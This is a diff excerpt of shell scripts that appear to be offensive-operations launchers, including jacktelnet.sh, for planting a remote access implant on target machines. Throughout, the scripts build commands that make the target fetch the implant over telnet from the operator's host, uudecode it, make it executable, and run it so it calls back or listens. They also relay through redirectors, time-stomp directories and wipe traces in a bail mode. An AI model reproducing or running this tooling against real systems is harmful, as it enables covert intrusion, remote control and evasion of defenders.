NOSERVER=`ls -1 /current/up/morerats/noserver* 2>/dev/null | grep -i ${ARCH} | tail -1`
|
||||||
|
fi
|
||||||
|
[ "$NOSERVER" ] || NOSERVER=/current/up/noserver
|
||||||
|
[ "$NOUU" ] && PACKARGS="$PACKARGS -u"
|
||||||
|
which packrat >/dev/null 2>&1
|
||||||
|
NOPACKRAT=$?
|
||||||
|
[ "$NOPACKRAT" = "0" ] || usage exit "${COLOR_FAILURE}No packrat in your path$COLOR_NORMAL"
|
||||||
|
# if [ ! "$LOCAL_PORT" ] ; then
|
||||||
|
# while [ 1 ] ; do
|
||||||
|
# LOCAL_PORT=`mkrandom -n 2>/dev/null`
|
||||||
|
# [ ! "$LOCAL_PORT" ] && usage exit "mkrandom not in path--needed to generate random rat upload port"
|
||||||
|
# ALREADYTHERE=`netstat -an | grep tcp.*LIST | grep ":$LOCAL_PORT "`
|
||||||
|
# [ "$ALREADYTHERE" ] || break
|
||||||
|
# done
|
||||||
|
# note "Using a random port ($LOCAL_PORT) for local RAT upload listener (packrat)"
|
||||||
|
# fi
|
||||||
|
# if [ -e "$NOSERVER" ] ; then
|
||||||
|
# if [ "$NOPACKRAT" = "0" ] ; then
|
||||||
|
# PACKRAT_SCRIPME=yes
|
||||||
|
# else
|
||||||
|
# [ "$NOPACKRAT" = "0" ] || usage exit "No packrat in your path$COLOR_NORMAL"
|
||||||
|
# fi
|
||||||
|
# else
|
||||||
|
# usage exit Put correct noserver into /current/up/noserver and try again
|
||||||
|
# fi
|
||||||
|
if [ "$NOPENPORT" ] ; then
|
||||||
|
[ "$NOPENCALLBACKIP" ] && TMPVAR=" to $NOPENCALLBACKIP"
|
||||||
|
note "Using NOPEN$NOPENCALLBACK$TMPVAR port $NOPENPORT"
|
||||||
|
unset TMPVAR
|
||||||
|
fi
|
||||||
|
[ "$UNCOMPRESS" ] && UNCOMPRESS=";uncompress -f $RAT_NAME.Z"
|
||||||
|
fi
|
||||||
|
[ "$RAT_TYPE" ] || RAT_TYPE=nopen
|
||||||
|
[ "$RAT_TYPE" = "nopen" ] || [ "$RAT_TYPE" = "nosy" ] || usage exit Invalid rat type $RAT_TYPE
|
||||||
|
[ "$JLPORT" -a "$ICMPTRIGGER" ] && usage exit "-I cannot be used with -j"
|
||||||
|
[ "$JLPORT" ] || JLPORT=$DEFJLPORT
|
||||||
|
|
||||||
|
PLATFORM=`uname`
|
||||||
|
if [ "$PLATFORM" = "Linux" ]; then
|
||||||
|
MINUSN=-n
|
||||||
|
else
|
||||||
|
MINUSN=""
|
||||||
|
fi
|
||||||
|
# need this always now...
|
||||||
|
MINUSN=""
|
||||||
|
|
||||||
|
|
||||||
|
if [ "$NOPENPORT" != "" ]; then
|
||||||
|
if [ $NOPENPORT -lt 1 -o $NOPENPORT -gt 65535 ]; then
|
||||||
|
usage exit rat_port must be between 1 and 65535, inclusive
|
||||||
|
fi
|
||||||
|
if [ "$RAT_TYPE" = "nosy" ]; then
|
||||||
|
RAT_PREARGS="P=$NOPENPORT "
|
||||||
|
else
|
||||||
|
if [ "$RAT_TYPE" = "nopen" ]; then
|
||||||
|
if [ "$NOPENCALLBACK" ] ; then
|
||||||
|
[ "$NOPENCALLBACKIP" ] || NOPENCALLBACKIP=$LOCALIP
|
||||||
|
if [ ! "$REDO" = "-B" ] ; then # i.e. if we're not bailing
|
||||||
|
RAT_PREARGS=" S=$NOPENCALLBACKDELAY D=-c${NOPENCALLBACKIP}:${NOPENPORT} "
|
||||||
|
notered "\aYou must establish a NOPEN listener on $LOCALIP:$NOPENPORT\n"
|
||||||
|
echo "${SECOND}remote nopen window on $LOCALIP:"
|
||||||
|
note "\ncd /current/down/\n/current/bin/noclient -l $NOPENPORT\n\n"
|
||||||
|
$SETCOLOR_FAILURE
|
||||||
|
echo -en "Hit ^C to abort or enter once NOPEN windows are ready"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
read blah
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
RAT_PREARGS=" D=-l${NOPENPORT} "
|
||||||
|
POSTRUN="noclient ${ACTUALTARGET}:${NOPENPORT}"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
usage exit rat_type $RAT_TYPE must be nosy or nopen
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
RAT_PREARGS=""
|
||||||
|
fi
|
||||||
|
## If we have $C, RAT_PREARGS just defined is thrown away.
|
||||||
|
#if [ "$NOPENCALLBACK" ] ; then
|
||||||
|
# NOPENCALLBACKPORT=`echo $C | cut -d ":" -f 2`
|
||||||
|
# RAT_PREARGS="D=-c$LOCALIP:$NOPENPORT "
|
||||||
|
#else
|
||||||
|
# RAT_PREARGS="D=-l$NOPENPORT "
|
||||||
|
#fi
|
||||||
|
|
||||||
|
JACKPOP=0
|
||||||
|
# are we jackpopping?
|
||||||
|
if [ ! "$RA" = "" ] || [ ! "$RP" = "" ] ; then
|
||||||
|
JACKPOP=1
|
||||||
|
if [ "$RA" = "" ] || [ "$RP" = "" ] ; then
|
||||||
|
echo "FATAL ERROR: Must have BOTH environment variables RA and RP set."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
# If NOPENJACK is set, -jackpop was used so don't bother with these.
|
||||||
|
if [ ! "$NOPENJACK" ] ; then
|
||||||
|
if [ ! "$RP" = "$JLPORT" ] ; then
|
||||||
|
echo "Shouldn't RP=JLPORT?
|
||||||
|
(you have RP=$RP and JLPORT=$JLPORT)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$RA" = "$REMOTEIP" ] || [ ! "$RA" = "$LOCALIP" ] ; then
|
||||||
|
echo "Shouldn't RA=LOCALIP=REMOTEIP? (you have
|
||||||
|
RA=$RA, LOCALIP=$LOCALIP
|
||||||
|
and REMOTEIP=$REMOTEIP)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
if [ ! "$TA" ] ; then
|
||||||
|
DEFTARGETIP=`egrep "^Target IP:" /current/etc/opscript.txt | awk '{print $3}' | head -1`
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the IP of your actual target you are redirecting
|
||||||
|
through $REMOTEIP to get to (this is used here to echo
|
||||||
|
a jackpop command to paste into your redirector): [$DEFTARGETIP]"
|
||||||
|
read TA
|
||||||
|
[ "$TA" ] || TA=$DEFTARGETIP
|
||||||
|
fi
|
||||||
|
if [ ! "$TP" ] ; then
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the actual target's JL trigger port (this is used here
|
||||||
|
to echo a jackpop command to paste into your redirector): [$JLPORT] "
|
||||||
|
read TP
|
||||||
|
[ "$TP" ] || TP=$JLPORT
|
||||||
|
fi
|
||||||
|
if [ ! "$LP" ] ; then
|
||||||
|
LP=$RP
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ "$SA" ] ; then
|
||||||
|
if [ ! "$NOPENJACK" ] && [ ! "`ifconfig | grep $SA`" ] ; then
|
||||||
|
echo "Shouldn't SA=one of your IPs?
|
||||||
|
(you have SA=$SA)."
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LOCAL_IP_GUESS=`ifconfig ppp0 2>/dev/null | grep inet | grep -v grep | grep -v ":127\." | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
# if that fails maybe it's on eth0
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || LOCAL_IP_GUESS=`ifconfig -a eth0 | grep inet | grep -v grep | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || echo "Unable to get local IP address..bailing"
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || exit 1
|
||||||
|
SA=$LOCAL_IP_GUESS
|
||||||
|
fi
|
||||||
|
fi # end # are we jackpopping?
|
||||||
|
if [ ! "$SHORTARGS" ] ; then
|
||||||
|
if [ "${TARGETDIR:0:1}" != "/" ] ; then
|
||||||
|
usage exit Targetdir must begin with \"/\". You gave: $TARGETDIR
|
||||||
|
fi
|
||||||
|
BASEDIR=`dirname "$TARGETDIR"`
|
||||||
|
|
||||||
|
BASEDIR2=`basename "$BASEDIR"`
|
||||||
|
|
||||||
|
# Check to make sure tcp LISTEN is there
|
||||||
|
PORTS=`netstat -an | grep tcp.*LIST | cut -f 2 -d ":" | sort -rn | awk '{print $1}' |egrep -v "6000"`
|
||||||
|
note Local ports LISTENing: $PORTS
|
||||||
|
if [ "$LOCAL_PORT" ] ; then
|
||||||
|
for i in $PORTS -1 ; do
|
||||||
|
[ "$i" = "$LOCAL_PORT" ] && break
|
||||||
|
done
|
||||||
|
if [ $i -lt 0 ] ; then
|
||||||
|
[ ! "$REDO" ] && PACKRAT_SCRIPME=yes
|
||||||
|
else
|
||||||
|
notered "\aLocalPort=$LOCAL_PORT provided on command line already LISTENing. Assuming that is the upload."
|
||||||
|
sleep 2
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
while [ 1 ] ; do
|
||||||
|
LOCAL_PORT=`mkrandom -n 2>/dev/null`
|
||||||
|
[ ! "$LOCAL_PORT" ] && usage exit "mkrandom not in path--needed to generate random rat upload port"
|
||||||
|
ALREADYTHERE=`netstat -an | grep tcp.*LIST | grep ":$LOCAL_PORT "`
|
||||||
|
[ "$ALREADYTHERE" ] || break
|
||||||
|
done
|
||||||
|
note "Using a random port ($LOCAL_PORT) for local RAT upload listener (packrat)"
|
||||||
|
[ ! "$REDO" ] && PACKRAT_SCRIPME=yes
|
||||||
|
fi # end if [ "$LOCAL_PORT" ]
|
||||||
|
if [ "$PACKRAT_SCRIPME" ] ; then
|
||||||
|
EXPLOIT_SCRIPME="packrat$PACKARGS $RAT_NAME $NOSERVER $LOCAL_PORT"
|
||||||
|
note "\nStarting local LISTENer to send noserver via port $LOCAL_PORT\n"
|
||||||
|
export EXPLOIT_SCRIPME
|
||||||
|
echo EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\" scripme -t PACKRAT -F -X \"-bg slategrey -fg white -geometry 131x55-0+0\"
|
||||||
|
EXPLOIT_SCRIPME="$EXPLOIT_SCRIPME" scripme -t PACKRAT -F -X "-bg slategrey -fg white -geometry 131x55-0+0"
|
||||||
|
fi
|
||||||
|
fi # end if [ ! "$SHORTARGS" ]
|
||||||
|
|
||||||
|
# at this point DOCMD="" if we're doing usual mkdir/cd/etc, otherwise not
|
||||||
|
if [ ! "$DOCMD" ] && [ "$BASEDIR2" != "tmp" ] ; then
|
||||||
|
TOUCHSTUFF="
|
||||||
|
touch -r $BASEDIR /tmp/.advt$$"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Now check what we can before continuing
|
||||||
|
echo ""
|
||||||
|
while [ 1 ] ; do
|
||||||
|
|
||||||
|
[ "$NOPENCALLBACK" ] || OKNRTUN=okeydokey
|
||||||
|
[ "$NOPENCALLBACK" ] && OKNRTUN=`netstat -an | grep "^tcp.*:$NOPENPORT " | egrep "ESTAB|LISTEN"`
|
||||||
|
# Ignore NOPENCALLBACK if in -Bail mode
|
||||||
|
[ "$NOPENCALLBACK" ] && [ "$REDO" = "-B" ] && OKNRTUN=yes
|
||||||
|
OKPACKRAT=`netstat -an | grep "^tcp.*0.0.0.0:$LOCAL_PORT .*LISTEN"`
|
||||||
|
[ "$REDO" ] && OKPACKRAT=yes
|
||||||
|
[ "$SHORTARGS" ] && OKPACKRAT=1
|
||||||
|
[ "$OKNRTUN" ] || notered "No -nrtun or noclient -l for callback seen locally on port $NOPENPORT in netstat"
|
||||||
|
if [ ! "$OKPACKRAT" ] ; then
|
||||||
|
if [ "$OKNRTUN" ] ; then
|
||||||
|
notered "waiting for packrat to start on port $LOCAL_PORT"
|
||||||
|
else
|
||||||
|
notered "No packrat seen locally on port $LOCAL_PORT in netstat"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
[ "$OKNRTUN" ] && [ "$OKPACKRAT" ] && break
|
||||||
|
|
||||||
|
[ "$OKNRTUN" ] && sleep 2 && continue
|
||||||
|
unset OKNRTUN OKPACKRAT
|
||||||
|
notered "\a\n\nCANNOT PROCEED"
|
||||||
|
notered -n "\a\n\nFix this and either ^C or hit Enter to try again."
|
||||||
|
read blah
|
||||||
|
done
|
||||||
|
unset OKNRTUN OKPACKRAT
|
||||||
|
|
||||||
|
if [ "$DOCMD" = "-R" ] ; then
|
||||||
|
DOCMD="cd $TARGETDIR || cd /tmp ; PATH=$TARGETDIR:. D=-c$LOCALIP:$NOPENPORT ${DOTSLASH}${RAT_NAME}"
|
||||||
|
# This time do not do TOUCHSTUFF again (assumes TARGET already there and created)
|
||||||
|
REALCMD="$DOCMD;exit 0"
|
||||||
|
elif [ "$DOCMD" = "-B" ] ; then
|
||||||
|
DOCMD="ls -alrt /tmp ; ls -alR $TARGETDIR ; rm -rf $TARGETDIR ; ls -arlt /tmp ; ls -alR $TARGETDIR"
|
||||||
|
# This time we're just cleaning and bailing
|
||||||
|
REALCMD="PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd $DOCMD; exit 0"
|
||||||
|
else
|
||||||
|
|
||||||
|
if [ "$DOCMD" = "" ] ; then
|
||||||
|
if [ "$AUTOCMD" ] ; then
|
||||||
|
# THIS IS DISABLED FORNOW
|
||||||
|
echo -n "Building command to have JL call automated packrat with..."
|
||||||
|
# this packrat has -L for do not start listener, just
|
||||||
|
# output the command needed remotely
|
||||||
|
DOCMD=`packrat -a $LOCAL_PORT -E "${RAT_PREARGS}" -eqL -d $TARGETDIR -i $LOCALIP $RAT_NAME`
|
||||||
|
echo "done.
|
||||||
|
Setting up listener in an xterm with:
|
||||||
|
xterm -hold +cm -e sh -c \"packrat -a $LOCAL_PORT -E '${RAT_PREARGS}' -e -d $TARGETDIR -i $LOCALIP $RAT_NAME\" \&
|
||||||
|
"
|
||||||
|
|
||||||
|
xterm -hold +cm -e sh -c "packrat -a $LOCAL_PORT -E '${RAT_PREARGS}' -e -d $TARGETDIR -i $LOCALIP $RAT_NAME" &
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
else
|
||||||
|
DOCMD="
|
||||||
|
mkdir -p $TARGETDIR
|
||||||
|
cd $TARGETDIR || cd /tmp
|
||||||
|
telnet $LOCALIP $LOCAL_PORT | cat > $RAT_NAME.uu
|
||||||
|
uudecode $RAT_NAME.uu $UNCOMPRESS
|
||||||
|
chmod 777 $RAT_NAME
|
||||||
|
PATH=$TARGETDIR:. ${RAT_PREARGS}${DOTSLASH}${RAT_NAME}"
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
REALCMD="$TOUCHSTUFF $DOCMD;exit 0"
|
||||||
|
fi
|
||||||
|
echo ""
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo ""
|
||||||
|
echo "Running these commands on target:"
|
||||||
|
note "REALCMD=\"$REALCMD\""
|
||||||
|
[ "$REDO" = "-B" ] && notered "\n\nIN BAIL MODE--WIPING SELF!!\n\n"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
if [ "$JACKPOP" = 1 ] && [ ! "$NOPENJACK" ] ; then
|
||||||
|
echo "
|
||||||
|
Using jackpop with environment variables as follows:
|
||||||
|
Redirector Address RA=$RA
|
||||||
|
Redirector Port RP=$RP
|
||||||
|
Target Address TA=$TA
|
||||||
|
Target Port TP=$TP
|
||||||
|
Listening Port on RA LP=$LP
|
||||||
|
Source Address SA=$SA
|
||||||
|
|
||||||
|
Now, some pastables. First, the jackpop command you need to run in an
|
||||||
|
INCISION window on $RA, then the -rtun command in a NOPEN window
|
||||||
|
on the same box, and finally an rm command to wipe jackpop: "
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "
|
||||||
|
chmod 700 jp&&netstat -an|grep $LP||PATH=. SA=$SA TA=$TA TP=$TP LP=$LP jp
|
||||||
|
|
||||||
|
rm jp ; ls -al ; ls -al jp
|
||||||
|
|
||||||
|
-rtun $LOCAL_PORT
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
fi
|
||||||
|
if [ "$TOUCHSTUFF" ] ; then
|
||||||
|
notered "
|
||||||
|
Location for working directory $TARGETDIR is not tmp.
|
||||||
|
Will do \"touch -r $BASEDIR /tmp/.advt$$\". Do not forget to use
|
||||||
|
and then rm it when you BAIL.
|
||||||
|
"
|
||||||
|
fi
|
||||||
|
echo "Command about to be executed LOCALLY:"
|
||||||
|
if [ "$ICMPTRIGGER" ] ; then
|
||||||
|
echo "ICMP_TYPE=$ICMPTRIGGER CMD=\"${REALCMD}\" JP -t $REMOTEIP"
|
||||||
|
if [ ! "$NOPENJACK" ] ; then
|
||||||
|
notered -n "\a\n\nCHECK SYNTAX IN REALCMD AND IN JP LINE BEFORE CONTINUING\n\n"
|
||||||
|
[ "$QUIET" ] || notered -n "hit enter to proceed, or <A>bort: "
|
||||||
|
[ "$QUIET" ] || read junk
|
||||||
|
[ "${junk:0:1}" = "A" -o "${junk:0:1}" = "a" ] && exit
|
||||||
|
fi
|
||||||
|
ICMP_TYPE=$ICMPTRIGGER CMD="${REALCMD}" JP -t $REMOTEIP
|
||||||
|
# ICMP_TYPE=$ICMPTRIGGER CMD="cd /tmp ; telnet 555.1.2.16 8787| cat > sendmail.uu;uudecode sendmail.uu" JP -t $REMOTEIP
|
||||||
|
else
|
||||||
|
echo " jl.command telnet $REMOTEIP $JLPORT"
|
||||||
|
if [ ! "$NOPENJACK" ] ; then
|
||||||
|
notered -n "\a\n\nCHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING\n\n"
|
||||||
|
[ "$QUIET" ] || notered -n "hit enter to proceed, or <A>bort: "
|
||||||
|
[ "$QUIET" ] || read junk
|
||||||
|
[ "${junk:0:1}" = "A" -o "${junk:0:1}" = "a" ] && exit
|
||||||
|
|
||||||
|
fi
|
||||||
|
export REALCMD
|
||||||
|
#now run jackladder
|
||||||
|
|
||||||
|
jl.command telnet $REMOTEIP $JLPORT
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Any parting words?
|
||||||
|
if [ ! "$NOPENCALLBACK" ] ; then
|
||||||
|
note "\n\nHere is a pastable to get there once rat is running:\n\n"
|
||||||
|
note "noclient $REMOTEIP:$NOPENPORT\n\n"
|
||||||
|
elif [ ! "$REDO" ] ; then
|
||||||
|
note "\n\nYou should see a callback to your NOPEN listener shortly.\n\n"
|
||||||
|
if [ ! "$REDO" ] ; then
|
||||||
|
echo -e "\nNOTE: Callback will not happen until $NOPENCALLBACKDELAY seconds or more have passed.\n"
|
||||||
|
while [ $NOPENCALLBACKDELAY -ge 0 ] ; do
|
||||||
|
notered -n "\rCounting down: $NOPENCALLBACKDELAY "
|
||||||
|
NOPENCALLBACKDELAY=`expr $NOPENCALLBACKDELAY - 1`
|
||||||
|
sleep 1
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
fi
|
366
archive_files/bin/jacktelnet.sh
Executable file
366
archive_files/bin/jacktelnet.sh
Executable file
|
@ -0,0 +1,366 @@
|
||||||
|
#!/bin/sh
|
||||||
|
COLOR_SUCCESS="\\033[1;32m"
|
||||||
|
COLOR_FAILURE="\\033[1;31m"
|
||||||
|
COLOR_WARNING="\\033[1;33m"
|
||||||
|
COLOR_NORMAL="\\033[0;39m"
|
||||||
|
COLOR_NOTE="\\033[0;34m"
|
||||||
|
SETCOLOR_SUCCESS="echo -en $COLOR_SUCCESS"
|
||||||
|
SETCOLOR_FAILURE="echo -en $COLOR_FAILURE"
|
||||||
|
SETCOLOR_WARNING="echo -en $COLOR_WARNING"
|
||||||
|
SETCOLOR_NORMAL="echo -en $COLOR_NORMAL"
|
||||||
|
SETCOLOR_NOTE="echo -en $COLOR_NOTE"
|
||||||
|
SYNTAX="<rem_ip> <loc_ip> <localport> <targetdir> \\
|
||||||
|
<rat_file> [<jl_port> [<rat_port> [nosy] ] ]"
|
||||||
|
DEFJLPORT=13
|
||||||
|
PROG=`basename ${0}`
|
||||||
|
VER=2.2
|
||||||
|
usage () {
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "
|
||||||
|
Usage:
|
||||||
|
[TA=target-address TP=target-port \\
|
||||||
|
RA=redirector-address RP=redirector-port] \\
|
||||||
|
[C=IP:nopen-callback-port] \\
|
||||||
|
$PROG [ options ] \\
|
||||||
|
[-D \"remote end environment variable(s)\"] \\
|
||||||
|
$SYNTAX
|
||||||
|
OR
|
||||||
|
[TA=target-address TP=target-port \\
|
||||||
|
RA=redirector-address RP=redirector-port] \\
|
||||||
|
$PROG [-1 | -2 | -3] <rem_ip> [<jl_port>]
|
||||||
|
|
||||||
|
OPTIONS
|
||||||
|
-i have IN bless us
|
||||||
|
-z expects uudecode only with NO COMPRESSION
|
||||||
|
-q disables \"confirm syntax\" prompt
|
||||||
|
|
||||||
|
* RA and RP required if redirecting JL with jackpop
|
||||||
|
* if RA/RP are provided without TA/TP you are prompted for TA/TP
|
||||||
|
* jl is assumed to be in ./jl
|
||||||
|
* jl_port defaults to $DEFJLPORT (arg required if rat_port is used)
|
||||||
|
* rat_port optional - default used if not given. BUT--if rat_port is
|
||||||
|
given and nopen is not being used, the final argument must be
|
||||||
|
nosy to send the older syntax up.
|
||||||
|
* C=IP:port is used as the nopen callback IP and port. C=IP:port
|
||||||
|
overrides rat_port argument, and -D argument below overrides C=port.
|
||||||
|
* -D argument is used to set environment vars at the far end before
|
||||||
|
execution. E.g.: -D 'D=\"-c loc_ip port\"'.
|
||||||
|
NOTE: If -D is used, the rat_port parameter and C=IP:port are ignored.
|
||||||
|
* -1 executes \"w ; ls -alR /tmp ; df -k\" instead of the usual
|
||||||
|
* -2 executes \"w ; netstat -an | egrep '(LISTEN|SYN_SENT)'\"
|
||||||
|
* -3 executes \"w ; which mkdir telnet cat uudecode uncompress chmod ls netstat egrep $RAT_FILE\"
|
||||||
|
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd 25 17348
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /tmp/.X11R6 nscd 113 33433 nosy
|
||||||
|
|
||||||
|
NOTE: You may now pre-set any/all of the following environment
|
||||||
|
variables if using jackpop with $PROG (RA & RP required).
|
||||||
|
|
||||||
|
For jl.command
|
||||||
|
locally: RA=redirector-address RP=redirector-port
|
||||||
|
|
||||||
|
For jackpop on LP=same-as-RP SA=your-source-IP
|
||||||
|
redirector: TA=target-address TP=target-JL-port
|
||||||
|
|
||||||
|
If you do not set LP and/or SA, they will be determined by the
|
||||||
|
<jl_port> parameter and ifconfig.
|
||||||
|
|
||||||
|
If you do not set TA and/or TP, you will be prompted for them.
|
||||||
|
|
||||||
|
$PROG version $VER
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "CommandLine: $PROG ${*}"
|
||||||
|
|
||||||
|
# this is default but may get shut off with -z arg
|
||||||
|
UNCOMPRESS="yes"
|
||||||
|
|
||||||
|
|
||||||
|
while [ "`echo \"$1\" | grep -- -`" ] ; do
|
||||||
|
NUM=`echo "$1" | cut -c 2`
|
||||||
|
case "$NUM" in
|
||||||
|
1)
|
||||||
|
DOCMD="
|
||||||
|
w ; ls -alR /tmp ; df -k"
|
||||||
|
;;
|
||||||
|
2)
|
||||||
|
DOCMD="
|
||||||
|
w ; netstat -an | egrep \"(LISTEN|SYN_SENT)\""
|
||||||
|
;;
|
||||||
|
3)
|
||||||
|
DOCMD="
|
||||||
|
w ; which mkdir telnet cat uudecode uncompress chmod ls netstat egrep"
|
||||||
|
;;
|
||||||
|
i)
|
||||||
|
INBLESS="SU= HIDEME= HIDECON= "
|
||||||
|
;;
|
||||||
|
a)
|
||||||
|
AUTOCMD=1
|
||||||
|
echo "The \"-a\" feature is disabled"
|
||||||
|
exit
|
||||||
|
;;
|
||||||
|
z)
|
||||||
|
UNCOMPRESS=""
|
||||||
|
;;
|
||||||
|
q)
|
||||||
|
QUIET=1
|
||||||
|
;;
|
||||||
|
D)
|
||||||
|
shift
|
||||||
|
E="$1"
|
||||||
|
;;
|
||||||
|
[hH])
|
||||||
|
usage
|
||||||
|
;;
|
||||||
|
[vV])
|
||||||
|
echo "$PROG version $VER"
|
||||||
|
exit
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo "Unrecognized argument $1"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
shift
|
||||||
|
done
|
||||||
|
|
||||||
|
[ "$DOCMD" ] && SHORTARGS=1
|
||||||
|
|
||||||
|
if [ $SHORTARGS ] ; then
|
||||||
|
if [ ${#} != 1 ] && [ ${#} != 2 ] ; then
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
JLPORT=$2
|
||||||
|
else
|
||||||
|
case "${#}" in
|
||||||
|
0|1|2|3|4|9)
|
||||||
|
usage
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
fi
|
||||||
|
|
||||||
|
REMOTEIP=$1
|
||||||
|
LOCALIP=$2
|
||||||
|
LOCALPORT=$3
|
||||||
|
TARGETDIR=$4
|
||||||
|
RAT_FILE=$5
|
||||||
|
[ "$JLPORT" ] || JLPORT=$6
|
||||||
|
RAT_PORT=$7
|
||||||
|
RAT_NAME=$8
|
||||||
|
[ "$UNCOMPRESS" ] && UNCOMPRESS="
|
||||||
|
uncompress -f $RAT_FILE.Z"
|
||||||
|
|
||||||
|
[ "$RAT_NAME" ] || RAT_NAME=nopen
|
||||||
|
|
||||||
|
PLATFORM=`uname`
|
||||||
|
if [ "$PLATFORM" = "Linux" ]; then
|
||||||
|
MINUSN=-n
|
||||||
|
else
|
||||||
|
MINUSN=""
|
||||||
|
fi
|
||||||
|
# need this always now...
|
||||||
|
MINUSN=""
|
||||||
|
|
||||||
|
[ "$JLPORT" ] || JLPORT=$DEFJLPORT
|
||||||
|
|
||||||
|
if [ "$RAT_PORT" != "" ]; then
|
||||||
|
if [ $RAT_PORT -lt 1025 -o $RAT_PORT -gt 65535 ]; then
|
||||||
|
echo rat_port must be between 1025 and 65535, inclusive
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
if [ "$RAT_NAME" = "nosy" ]; then
|
||||||
|
RAT_ARG="P=$RAT_PORT "
|
||||||
|
else
|
||||||
|
if [ "$RAT_NAME" = "nopen" ]; then
|
||||||
|
RAT_ARG="D=\"-l $RAT_PORT\" "
|
||||||
|
DIDTHIS="# -jackpopped to $REMOTEIP\n-nstun $REMOTEIP $RAT_PORT\n"
|
||||||
|
else
|
||||||
|
echo rat_name $RAT_NAME is not nosy or nopen
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
RAT_ARG=""
|
||||||
|
fi
|
||||||
|
# If we have $C, RAT_ARG just defined is thrown away.
|
||||||
|
if [ "$C" != "" ] ; then
|
||||||
|
CALLBACKIP=`echo $C | cut -d ":" -f 1`
|
||||||
|
CALLBACKPORT=`echo $C | cut -d ":" -f 2`
|
||||||
|
RAT_ARG="D=\"-c $CALLBACKIP $CALLBACKPORT\" "
|
||||||
|
DIDTHIS="# -jackpopped to $TA callback to $CALLBACKIP:$CALLBACKPORT--callback\n-call $CALLBACKIP $CALLBACKPORT\n\n-nrtun $CALLBACKPORT\n"
|
||||||
|
fi
|
||||||
|
# If we have $E, it came from -D argument, and any RAT_ARG
|
||||||
|
# just defined is thrown away.
|
||||||
|
# This allows for changes in nopen syntax.
|
||||||
|
if [ "$E" != "" ] ; then
|
||||||
|
RAT_ARG="$E "
|
||||||
|
DIDTHIS=
|
||||||
|
fi
|
||||||
|
|
||||||
|
JACKPOP=0
|
||||||
|
# are we jackpopping?
|
||||||
|
if [ ! "$RA" = "" ] || [ ! "$RP" = "" ] ; then
|
||||||
|
JACKPOP=1
|
||||||
|
if [ "$RA" = "" ] || [ "$RP" = "" ] ; then
|
||||||
|
echo "FATAL ERROR: Must have BOTH environment variables RA and RP set."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
# If NOPENJACK is set, -jackpop was used so don't bother with these.
|
||||||
|
if [ ! "$NOPENJACK" ] ; then
|
||||||
|
if [ ! "$RP" = "$JLPORT" ] ; then
|
||||||
|
echo "Shouldn't RP=JLPORT?
|
||||||
|
(you have RP=$RP and JLPORT=$JLPORT)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$RA" = "$REMOTEIP" ] || [ ! "$RA" = "$LOCALIP" ] ; then
|
||||||
|
echo "Shouldn't RA=LOCALIP=REMOTEIP? (you have
|
||||||
|
RA=$RA, LOCALIP=$LOCALIP
|
||||||
|
and REMOTEIP=$REMOTEIP)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
if [ ! "$TA" ] ; then
|
||||||
|
DEFTARGETIP=`egrep "^Target IP:" /current/etc/opscript.txt | awk '{print $3}' | head -1`
|
||||||
|
